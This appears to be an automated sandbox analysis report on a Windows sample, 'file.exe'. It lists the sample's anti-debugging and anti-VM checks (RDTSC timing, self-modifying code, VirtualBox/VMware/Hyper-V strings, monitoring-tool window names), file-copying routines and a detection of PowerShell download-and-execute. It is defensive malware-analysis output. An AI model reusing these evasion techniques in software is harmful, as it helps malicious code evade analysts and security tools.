              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B629D second address: 8B62A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C732A second address: 8C732F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DC508 second address: 8DC524 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE4C1200296h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DC524 second address: 8DC52A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DC52A second address: 8DC536 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DC536 second address: 8DC53C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DC660 second address: 8DC67E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE4C1200293h 0x00000008 jl 00007FE4C1200286h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DC7D5 second address: 8DC814 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FE4C10F4F66h 0x00000008 jc 00007FE4C10F4F66h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007FE4C10F4F73h 0x00000015 push edi 0x00000016 pushad 0x00000017 popad 0x00000018 pop edi 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c push ecx 0x0000001d jmp 00007FE4C10F4F73h 0x00000022 pop ecx 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DC814 second address: 8DC81E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FE4C1200286h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DC81E second address: 8DC82E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jbe 00007FE4C10F4F6Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DD0E2 second address: 8DD0E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DD0E6 second address: 8DD126 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 pushad 0x00000008 jmp 00007FE4C10F4F74h 0x0000000d pushad 0x0000000e jmp 00007FE4C10F4F6Ah 0x00000013 jmp 00007FE4C10F4F6Eh 0x00000018 popad 0x00000019 jc 00007FE4C10F4F6Eh 0x0000001f push edx 0x00000020 pop edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DD126 second address: 8DD132 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FE4C1200297h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E197C second address: 8E1982 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E1A29 second address: 8E1A2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E1A2D second address: 8E1A3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b push esi 0x0000000c pop esi 0x0000000d pop edi 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E1A3B second address: 8E1AC4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007FE4C1200286h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f jmp 00007FE4C1200294h 0x00000014 push 00000004h 0x00000016 call 00007FE4C1200290h 0x0000001b pushad 0x0000001c mov bx, 9AD8h 0x00000020 mov dx, 77A0h 0x00000024 popad 0x00000025 pop edx 0x00000026 mov dword ptr [ebp+122D3779h], ebx 0x0000002c call 00007FE4C1200289h 0x00000031 push ecx 0x00000032 jmp 00007FE4C1200291h 0x00000037 pop ecx 0x00000038 push eax 0x00000039 pushad 0x0000003a pushad 0x0000003b push ebx 0x0000003c pop ebx 0x0000003d push esi 0x0000003e pop esi 0x0000003f popad 0x00000040 je 00007FE4C1200288h 0x00000046 pushad 0x00000047 popad 0x00000048 popad 0x00000049 mov eax, dword ptr [esp+04h] 0x0000004d jmp 00007FE4C120028Ah 0x00000052 mov eax, dword ptr [eax] 0x00000054 push eax 0x00000055 push edx 0x00000056 push eax 0x00000057 push edx 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E1AC4 second address: 8E1AC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E1AC8 second address: 8E1ACC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E1ACC second address: 8E1AD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E34E7 second address: 8E350F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FE4C120028Ch 0x0000000d jmp 00007FE4C120028Bh 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E350F second address: 8E3515 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E3515 second address: 8E351A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E309C second address: 8E30A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E30A2 second address: 8E30A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E30A6 second address: 8E30D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE4C10F4F78h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007FE4C10F4F75h 0x00000011 jmp 00007FE4C10F4F6Dh 0x00000016 push esi 0x00000017 pop esi 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E30D9 second address: 8E30DE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F40272 second address: 4F40278 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F40278 second address: 4F4028C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov di, 0432h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 mov cx, 3471h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F40326 second address: 4F4032A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F4032A second address: 4F40330 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F40330 second address: 4F40370 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4C10F4F76h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov eax, edi 0x0000000d mov eax, ebx 0x0000000f popad 0x00000010 xchg eax, ebp 0x00000011 jmp 00007FE4C10F4F6Fh 0x00000016 mov ebp, esp 0x00000018 pushad 0x00000019 push ecx 0x0000001a mov esi, edx 0x0000001c pop edx 0x0000001d popad 0x0000001e pop ebp 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F40370 second address: 4F40374 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F40374 second address: 4F40386 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4C10F4F6Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Tries to evade debugger and weak emulator (self modifying code)
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 64F8DE instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 64F9B7 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 81CACF instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 808722 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 87DFCA instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeEvaded block: after key decisiongraph_0-27167
              Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_0-25985
              Source: C:\Users\user\Desktop\file.exeAPI coverage: 4.8 %
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004118A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_004118A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00413910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00413910
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00411250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00411250
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00411269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00411269
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041E210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_0041E210
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00414B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00414B10
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00414B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_00414B29
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041CBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_0041CBE0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040DB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0040DB80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00412390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,0_2_00412390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040DB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0040DB99
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004123A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_004123A9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041DD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,0_2_0041DD30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041D530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0041D530
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004016A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_004016A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004016B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_004016B9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00421BF0 lstrcpy,ExitProcess,GetSystemInfo,ExitProcess,GetUserDefaultLangID,ExitProcess,ExitProcess,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,OpenEventA,CloseHandle,Sleep,OpenEventA,CreateEventA,CloseHandle,ExitProcess,0_2_00421BF0
              Source: file.exe, file.exe, 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: file.exe, 00000000.00000002.1522326773.000000000101C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1522326773.0000000000FF9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1522326773.0000000000FE3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: file.exe, 00000000.00000002.1522326773.0000000000F9E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
              Source: file.exe, 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25971
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25979
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25824
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25843
              Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Hides threads from debuggers
              Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
              Tries to detect sandboxes and other dynamic analysis tools (window names)
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00404A60 VirtualProtect 00000000,00000004,00000100,?0_2_00404A60
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00426390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00426390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00426390 mov eax, dword ptr fs:[00000030h]0_2_00426390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00422A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00422A40
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Yara detected Powershell download and execute
